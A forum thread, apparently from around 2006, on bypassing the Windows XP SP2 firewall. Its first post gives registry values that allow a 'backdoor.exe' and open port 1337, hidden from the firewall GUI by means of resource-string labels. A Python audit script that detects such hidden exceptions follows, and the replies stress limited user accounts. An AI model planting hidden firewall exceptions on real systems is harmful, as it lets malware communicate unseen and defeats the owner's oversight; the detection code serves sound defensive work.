
Bypassing Windows Firewall, XP SP2 example

19 years 3 months ago #9121 by ping
Recently I found this way to bypass the Windows SP2 inbuilt firewall. This is for educational purposes strictly. So, here it goes

We can bypass windows firewall using registry.

Just open regedit.exe and go to
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List[/code:1]

As you can see, the SharedAccess service, aka Windows Firewall, contains the names of applications allowed for outbound connections.

To give access to the desired application we need to add a similar key:
[code:1]"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled"[/code:1]

But then our "backdoor" will be listed in the Firewall GUI allowed applications.

Anyway, we may hide it by making it like this
[code:1]"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]

We can also open globally any port we want

[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List[/code:1]

by adding a similar value inside this registry key
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]

Where "Name" is the name we want to be shown in the GUI

To hide the port from the listing in the GUI we may make something like this

[code:1]"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"[/code:1]

and then the port will be hidden from the listing (XP SP2)..

It works on XP SP2; I didn't test it on any other OS.

This method is used by some malware/spyware manufacturers, and together with a rootkit it may be really dangerous.

The greatest pleasure in life is doing what people say you can not do..!!
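As an added defensive example (not code from the thread's author): a Python script that parses a regedit export of the two List keys described in the post and flags every enabled exception that is missing from an expected baseline, marking those whose GUI label is an @xpsp2res.dll string reference of the kind used above to hide entries. The export text and the baseline set are constructed for the example.

```python
import re
from collections import namedtuple
# Constructed .reg-style export of the two XP SP2 keys named in the post (not a real
# capture); the two hidden entries reuse the @xpsp2res.dll references the post shows.
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:Remote Desktop"
"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"
'''
KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"(.+?)"="(.*)"$')
DATA_RE = re.compile(r'^([^:]*):(Enabled|Disabled)(?::(.*))?$', re.I)  # <scope>:<state>[:<label>]
RESOURCE_NAME_RE = re.compile(r'^@[^,]+\.dll,-\d+$', re.I)               # e.g. @xpsp2res.dll,-22019
FwEntry = namedtuple('FwEntry', 'section name enabled label')          # name: app path or port:proto

def parse_firewall_export(text):
    entries, section = [], None
    for line in (l.strip() for l in text.splitlines()):
        key = KEY_RE.match(line)
        if key:   # keep the subkey just above "List", e.g. AuthorizedApplications
            section = key.group(1).rpartition('\\')[0].rpartition('\\')[2] or None
            continue
        val = VALUE_RE.match(line)
        if not val or section not in ('AuthorizedApplications', 'GloballyOpenPorts'):
            continue
        name, data = (g.replace('\\\\', '\\') for g in val.groups())   # undo .reg escaping
        # value data repeats the value name, then <scope>:<Enabled|Disabled>[:<display label>]
        rest = DATA_RE.match(data[len(name) + 1:]) if data.startswith(name + ':') else None
        if rest is None:
            continue                                                  # malformed entry
        entries.append(FwEntry(section, name, rest.group(2).lower() == 'enabled', rest.group(3) or ''))
    return entries

def audit(entries, baseline):
    """Enabled exceptions missing from an admin-supplied baseline. Windows' own exceptions
    also carry @xpsp2res.dll labels, so that flag means 'cross-check the GUI', not 'malicious'."""
    findings = []
    for e in entries:
        if e.enabled and e.name.lower() not in baseline:
            reason = 'not in baseline'
            if RESOURCE_NAME_RE.match(e.label):
                reason += '; label is a string resource, so it may not show in the Exceptions tab'
            findings.append((e.section, e.name, reason))
    return findings

BASELINE = {r'c:\program files\messenger\msmsgs.exe', '3389:tcp'}   # assumed expected set
```

Run it against a real export with `audit(parse_firewall_export(open('fw.reg').read()), BASELINE)` after filling BASELINE with the exceptions you expect on that machine.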
19 years 3 months ago #9123 by TheBishop
Replied by TheBishop on topic Ports
Ouch! That's worth knowing
19 years 3 months ago #9126 by nske
Well, of course from an administrator account everything's possible! The firewall's rules had to be stored somewhere after all.. :)
The above would not work in a limited account, since access to the registry is prohibited.

It is nice that you described this though, if nothing else to demonstrate how easily malware can reconfigure the Windows firewall to allow itself out and how many more considerations there are to take when logged in as an administrator!
19 years 3 months ago #9128 by DaLight
I second nske's comments. I run all my users in non-admin mode at work and at home! This I believe is the major reason behind spyware infections. Obviously this problem mainly exists in the Windows world where people are not so familiar with the concept of root and limited user accounts.
19 years 3 months ago #9131 by nske
Well, since Microsoft likes to push users to the direction it wants in everything (default software, default settings, etc), it would be a good idea to encourage this and some other security-conscious decisions during the installation.
After all, nobody would complain about having to relogin each time he needs to install some new software or configure something, as they complain now about having an unusable malware-infected system; besides, the procedure could be more transparent, not requiring the current login session to be disrupted. ;)

PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol: